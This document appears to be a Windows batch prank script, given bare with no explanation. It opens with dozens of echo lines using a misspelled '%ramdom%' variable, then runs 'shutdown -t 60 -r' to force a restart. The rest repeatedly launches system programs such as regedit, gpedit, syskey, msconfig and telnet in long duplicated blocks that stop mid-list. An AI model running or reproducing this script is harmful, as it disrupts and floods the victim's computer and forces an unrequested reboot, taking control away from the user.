echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
start notepad.exe 
shutdown -t 60 -r 
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
